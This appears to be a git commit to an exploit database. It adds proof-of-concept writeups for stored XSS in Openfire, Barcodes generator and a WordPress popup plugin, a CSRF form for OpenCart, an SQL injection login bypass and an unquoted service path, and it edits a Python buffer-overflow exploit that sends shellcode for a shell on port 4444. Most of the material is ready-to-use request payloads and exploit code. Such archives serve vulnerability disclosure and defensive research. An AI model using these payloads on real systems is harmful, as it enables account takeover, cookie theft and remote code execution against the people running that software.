DB: 2020-12-11

7 changes to exploits/shellcodes PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path Barcodes generator 1.0 - 'name' Stored Cross Site Scripting OpenCart 3.0.3.6 - Cross Site Request Forgery Openfire 4.6.0 - 'path' Stored XSS Library Management System 2.0 - Auth Bypass SQL Injection WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting
2020-12-11 05:01:59 +00:00 · 2020-12-11 05:01:59 +00:00 · 42b9ff04f0
commit 42b9ff04f0
parent c5f0b6dbf5
8 changed files with 236 additions and 1 deletions
--- a/exploits/jsp/webapps/49229.txt
+++ b/exploits/jsp/webapps/49229.txt
@ -0,0 +1,27 @@
+# Exploit Title: Openfire 4.6.0 - 'path' Stored XSS
+# Date: 20201209
+# Exploit Author: j5s
+# Vendor Homepage: https://github.com/igniterealtime/Openfire
+# Software Link: https://www.igniterealtime.org/downloads/
+# Version: 4.6.0
+
+POST /plugins/nodejs/nodejs.jsp HTTP/1.1
+Host: 192.168.137.137:9090
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101
+Firefox/68.0
+Content-Length: 60
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded
+Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0;
+csrf=dWiihlZamEAB0mrO; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn;
+jiveforums.admin.logviewer=debug.size=0&all.size=524269&warn.size=856459&error.size=0&info.size=145819
+Origin: http://192.168.137.137:9090
+Referer: http://192.168.137.137:9090/plugins/nodejs/nodejs.jsp
+Upgrade-Insecure-Requests: 1
+Accept-Encoding: gzip
+
+path=%22%3E%3CScRiPt%3Eaozunukfyd%3C%2FsCrIpT%3E&update=Save
+
+payload："><ScRiPt>alert(document.cookie)</ScRiPt>
--- a/exploits/php/webapps/49227.txt
+++ b/exploits/php/webapps/49227.txt
@ -0,0 +1,37 @@
+# Exploit Title: Barcodes generator 1.0 - 'name' Stored Cross Site Scripting
+# Date: 10/12/2020
+# Exploit Author: Nikhil Kumar 
+# Vendor Homepage: http://egavilanmedia.com/
+# Software Link: http://egavilanmedia.com/barcodes-generator-using-php-mysql-and-jsbarcode-library/
+# Version: 1.0
+# Tested On: Ubuntu
+
+1. Open the index.php page using following url 
+
+http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php
+
+click on the New Barcode
+
+2. Intercept the request through burp suite
+
+Put a payload on "name=" parameter
+
+Payload :- abc"><script>alert("XSS")</script>
+
+Malicious Request::
+
+POST /Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/php/insert.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 6
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php
+Upgrade-Insecure-Requests: 1
+
+name=abc"><script>alert("XSS")</script>
--- a/exploits/php/webapps/49228.txt
+++ b/exploits/php/webapps/49228.txt
@ -0,0 +1,31 @@
+# Exploit Title: OpenCart 3.0.3.6 - Cross Site Request Forgery
+# Date: 12-11-2020
+# Exploit Author: Mahendra Purbia {Mah3Sec}
+# Vendor Homepage: https://www.opencart.com
+# Software Link: https://www.opencart.com/index.php?route=cms/download
+# Version: OpenCart CMS - 3.0.3.6 
+# Tested on: Kali Linux
+
+#Description: 
+This product have the functionality which let user to add the wish-list of other user in to his/her cart. So, user A can add products to his/her wish-list and can make his/her wish-list public which let other users to see the wish-list. Now, as user B there is a button of add to cart , when you click on it that public wish-list will be added in to your cart.
+
+#Additional Information:
+well i found this vulnerability in Opencart based websites but they not respond so i installed a lest version of Opencart CMS and hosted on localhost with help of XAMP and then i exploited that vulnerability.
+Attack Vector:
+1. create two accounts A(attacker) & B(victim)
+2. login with A and add a product in cart and capture that particular request in burpsuite.
+3. Now change the quantity if want and then create a csrf poc of that request.
+4. Save it as .html and send it to victim. Now the product added to victims cart.
+
+#POC: 
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/shop/index.php?route=checkout/cart/add" method="POST">
+      <input type="hidden" name="product&#95;id" value="43" />
+      <input type="hidden" name="quantity" value="10000000" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
--- a/exploits/php/webapps/49230.txt
+++ b/exploits/php/webapps/49230.txt
@ -0,0 +1,21 @@
+# Exploit Title: Library Management System 2.0 - Auth Bypass SQL Injection
+# Date: 2020-12-09
+# Exploit Author: Manish Solanki
+# Vendor Homepage: https://www.sourcecodester.com/php/6849/library-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=6849&title=Library+Management+System+in+PHP%2FMySQLi+with+Source+Code
+# Version: 2.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#Vulnerable Page: admin page
+
+#Exploit
+Open the Application
+check the URL:
+http://localhost/eb_magalona_lms
+
+Open Admin Login
+Enter username: a' or 1=1--
+Enter password: '
+
+click on login
+The SQL payload gets executed and authorization is bypassed successfully
--- a/exploits/php/webapps/49231.txt
+++ b/exploits/php/webapps/49231.txt
@ -0,0 +1,73 @@
+# Exploit Title: WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting
+# Date: 11/27/2020
+# Exploit Author: Ilca Lucian Florin
+# Vendor Homepage: https://sygnoos.com
+# Software Link: https://wordpress.org/plugins/popup-builder/ / https://popup-builder.com/
+# Version: <= 3.69.6
+# Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge
+
+The Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter
+Plugin is vulnerable to stored cross site scripting. There are multiple
+parameters vulnerable to cross site scripting.
+
+All versions up to 3.69.6 are vulnerable to stored cross site scripting.
+
+More information about this plugin could be found on the following links:
+
+1. https://wordpress.org/plugins/popup-builder/
+2. https://popup-builder.com/
+
+Cross site scripting (XSS) is a common attack vector that injects malicious
+code into a vulnerable web application. XSS differs from other web attack
+vectors (e.g., SQL injections), in that it does not directly target the
+application itself. Instead, the users of the web application are the ones
+at risk. A successful cross site scripting attack can have devastating
+consequences for an online business’s reputation and its relationship with
+its clients. Stored XSS, also known as persistent XSS, is the more damaging
+of the two. It occurs when a malicious script is injected directly into a
+vulnerable web application.
+
+# How to reproduce #
+
+1. Login as Editor or Administrator: https://website.com/wp-login/
+
+2. Go to the following link:
+https://website.com/wp-admin/edit.php?post_type=popupbuilder or search for
+PopUp Builder and select or create new PopUp.
+
+2. Click edit
+
+3. Search and find: # Custom JS or CSS
+
+4. On JS -> Opening events section, add two payloads, one for #2 section
+and one for #3 section, like in the following example:
+
+#2 Add the code you want to run before the popup opens. This will be the
+code that will work in the process of opening the popup. true/false
+conditions will not work in this phase.
+
+<textarea class="wp-editor-area editor-content" data-attr-event="WillOpen"
+placeholder=" #... type your code" mode="text/javascript"
+name="sgpb-WillOpen">"><script
+src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea>
+
+#3 Add the code you want to run after the popup opens. This code will work
+when the popup is already open on the page.
+
+<textarea class="wp-editor-area editor-content" data-attr-event="DidOpen"
+placeholder=" #... type your code" mode="text/javascript"
+name="sgpb-DidOpen">"><script
+src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea>
+
+5. Click Update
+
+6. Go to https://website.com. The XSS alert will pop up.
+
+# All text-areas from JS section are vulnerable to stored cross site
+scripting.
+
+Evidence:
+
+1. https://ibb.co/JvBTq0H
+2. https://ibb.co/0KP7NFQ
+3. https://ibb.co/3cFnVYF
--- a/exploits/windows/local/49226.txt
+++ b/exploits/windows/local/49226.txt
@ -0,0 +1,37 @@
+# Exploit Title: PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path
+# Discovery by: Zaira Alquicira
+# Discovery Date: 2020-12-10
+# Vendor Homepage:  https://pdf-complete.informer.com/3.5/
+# Tested Version: 3.5.310.2002
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i
+"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "pdfsvc" | findstr /i /v
+"""
+
+PDF Complete
+
+PDF Complete  C:\Program Files (x86)\PDF Complete\pdfsvc.exe
+/startedbyscm:66B66708-40E2BE4D-pdfcService
+Auto
+
+
+# Service info:
+
+C:\Users\TOSHIBA>sc qc "pdfcDispatcher"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: pdfcDispatcher
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\PDF Complete\pdfsvc.exe
+/startedbyscm:66B66708-40E2BE4D-pdfcService
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : PDF Document Manager
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
--- a/exploits/windows/remote/49217.py
+++ b/exploits/windows/remote/49217.py
@ -51,6 +51,7 @@ PAYLOAD = (
    b'\x90' * (2482 - len(SHELL)) +
    SHELL +
    b'\xeb\x10\x90\x90' +
+    # 0x1002071c: add esp,8 # ret 0x04 at libspp.dll (ASLR: False, Rebase: False, SafeSEH: False)
    struct.pack('<L', 0x1002071c) +
    b'\x90' * 32  +
    b'\xE9\x4D\xF6\xFF\xFF' +
@ -64,4 +65,6 @@ HTTP_PAYLOAD = (
 )

 with socket.create_connection((HOST, PORT)) as fd:
-    fd.sendall(HTTP_PAYLOAD)
+    print('[+] Sending payload...')
+    fd.sendall(HTTP_PAYLOAD)
+    print('[+] Done. Check for a shell on port 4444.')
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11229,6 +11229,7 @@ id,file,description,date,author,type,platform,port
 49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
 49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
 49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
+49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43445,3 +43446,8 @@ id,file,description,date,author,type,platform,port
 49222,exploits/php/webapps/49222.txt,"Task Management System 1.0 - 'First Name and Last Name' Stored XSS",2020-12-09,"Saeed Bala Ahmed",webapps,php,
 49223,exploits/php/webapps/49223.txt,"Task Management System 1.0 - Unrestricted File Upload to Remote Code Execution",2020-12-09,"Saeed Bala Ahmed",webapps,php,
 49224,exploits/php/webapps/49224.txt,"Task Management System 1.0 - 'id' SQL Injection",2020-12-09,"Saeed Bala Ahmed",webapps,php,
+49227,exploits/php/webapps/49227.txt,"Barcodes generator 1.0 - 'name' Stored Cross Site Scripting",2020-12-10,"Nikhil Kumar",webapps,php,
+49228,exploits/php/webapps/49228.txt,"OpenCart 3.0.3.6 - Cross Site Request Forgery",2020-12-10,"Mahendra Purbia",webapps,php,
+49229,exploits/jsp/webapps/49229.txt,"Openfire 4.6.0 - 'path' Stored XSS",2020-12-10,j5s,webapps,jsp,
+49230,exploits/php/webapps/49230.txt,"Library Management System 2.0 - Auth Bypass SQL Injection",2020-12-10,"Manish Solanki",webapps,php,
+49231,exploits/php/webapps/49231.txt,"WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting",2020-12-10,"Ilca Lucian Florin",webapps,php,